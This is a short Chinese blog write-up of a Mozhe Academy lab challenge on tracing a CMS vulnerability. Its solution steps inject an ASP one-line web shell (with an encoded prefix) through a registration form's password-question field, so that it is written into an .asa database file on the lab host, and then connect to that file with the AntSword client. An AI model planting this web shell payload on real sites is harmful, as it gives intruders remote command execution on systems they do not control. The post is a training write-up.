TypechoJoeTheme

mmzkyl

墨者学院靶场_CMS系统漏洞分析溯源(第3题)

mmzkyl博主
2021-11-08
/
0 评论
/
155 阅读
/
115 个字
/
百度已收录
11/08
本文最后更新于2021年11月08日,已超过196天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!

随笔

  • 2021-11-08 15:57
    利用是利用成功了,不过有个大问题,利用时所使用的马是怎么编码转换的


目标靶场



解题步骤

  • 充满年代感的首页
  • 进入注册界面
  • 正常填写表单,在密码问题处尝试进行注入
    ┼攠數畣整爠煥敵瑳∨≡┩愾 <% execute request("a")%>
  • 访问数据库确认是否写入成功
    http http://219.153.49.228:49847/data/ask_newasp.asa
  • 尝试使用蚁剑进行连接
    http://219.153.49.228:49847/data/ask_newasp.asa
  • 连接成功,寻找相应Key即可
赞(0)
评论 (0)

互动读者

  • pmydwqdfs闲逛

    评论 1 次 | 文章 0 篇

  • canon pixma tr4520闲逛

    评论 1 次 | 文章 0 篇

  • playtech slot indonesia闲逛

    评论 1 次 | 文章 0 篇

  • vwbszmzlph闲逛

    评论 1 次 | 文章 0 篇

标签云